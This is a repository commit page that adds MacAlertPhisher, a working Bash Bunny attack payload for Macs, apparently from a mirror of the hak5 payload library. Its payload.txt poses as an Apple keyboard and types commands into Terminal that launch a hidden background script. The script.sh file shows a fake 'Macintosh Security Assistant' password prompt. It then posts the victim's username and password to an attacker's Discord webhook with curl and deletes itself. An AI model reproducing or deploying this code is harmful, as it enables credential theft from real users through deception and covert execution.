hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #651 from 90N45-d3v/master 

Add MacAlertPhisher
pull/614/merge
Peaks 2024-06-07 16:04:37 -04:00 committed by GitHub
parent e43de0efbd 0750db3a35
commit 69c31ff1e8
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 137 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
payloads/library/phishing/MacAlertPhisher/README.md Normal file
View File

@ -0,0 +1,24 @@
# MacAlertPhisher
* Author: 90N45
* Version: 1.0
* Target: Mac
* Attackmodes: HID, STORAGE
### Description
Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
<img width="532" alt="MAcAlertPhisher_alert_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/d52f4924-c51a-46fd-b2c3-2a8cce45e2cc">
<br>
<img width="412" alt="MacAlertPhisher_message_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/8d4e804c-0630-4853-b4ed-7d0904408a50">
### Setup
Please insert your [Discords Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs.
### Status
| LED | State |
| --- | --- |
| Magenta solid (SETUP) | Set ATTACKMODE |
| Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine |
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) |
*Average runtime: 27 seconds*

37
payloads/library/phishing/MacAlertPhisher/payload.txt Normal file
View File

@ -0,0 +1,37 @@
#!/bin/bash
#
# Title: MacAlertPhisher
# Description: Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
# Author: 90N45
# Version: 1.0
# Category: Phishing
# Attackmodes: HID, STORAGE
LED SETUP
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
LED ATTACK
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2500
QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "diskutil eject /Volumes/BashBunny/"
QUACK ENTER
QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &"
QUACK ENTER
QUACK DELAY 2000
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "killall Terminal"
QUACK ENTER
LED FINISH

76
payloads/library/phishing/MacAlertPhisher/script.sh Normal file
View File

@ -0,0 +1,76 @@
#!/bin/bash
# Discord Webhook Link (NEEDED)
discord=""
# The alert's title
title="Macintosh Security Assistant"
# The alert's text
dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are the owner."
# The alert's icon (for ex. "stop", "caution", "note")
icon="stop"
# A custom application, that should open the alert (for ex. "Finder")
app=""
# Base64 encode the entered string to prevent an injection/error
base64=false
# Check if an internet connection is available and wait until it is before trying to send the Discord message
internet_check=false
#### The main script
date=$(date)
user=$(whoami)
if [[ ${app} != "" ]]; then
pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
elif [[ ${app} == "" ]]; then
pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
fi
pwd=${pwd#*"button returned:Continue, text returned:"}
if [[ ${base64} == true ]]; then
pwd=$(echo $pwd | base64)
enc_txt="(Base64)"
else
enc_txt=""
fi
# Discord Embed Message
embed="{
\"embeds\": [
{
\"color\": 14427938,
\"footer\": {
\"text\": \"Captured: ${date}\"
},
\"author\": {
\"name\": \"Bash Bunny • MacAlertPhisher\",
\"url\": \"https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacAlertPhisher\",
\"icon_url\": \"https://www.gitbook.com/cdn-cgi/image/width=40,dpr=2,height=40,fit=contain,format=auto/https%3A%2F%2F3076592524-files.gitbook.io%2F~%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FnxJgJ9UdPfrcuL1U8DpL%252Ficon%252F1UaEKnAJMPWZDBVtU8Il%252Fbb.png%3Falt%3Dmedia%26token%3D43bf1669-462c-4295-b30b-94c295470371\"
},
\"fields\": [
{
\"name\": \"Current User\",
\"value\": \"${user}\",
\"inline\": true
},
{
\"name\": \"Entered Credentials ${enc_txt}\",
\"value\": \"${pwd}\",
\"inline\": true
}
]
}
]
}"
if [[ ${internet_check} == true ]]; then
while [[ $(ping -c1 google.com | grep -c "1 packets received") != "1" ]]; do
sleep 5
done
fi
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "${embed}" ${discord}
# Self destruct
rm /tmp/script.sh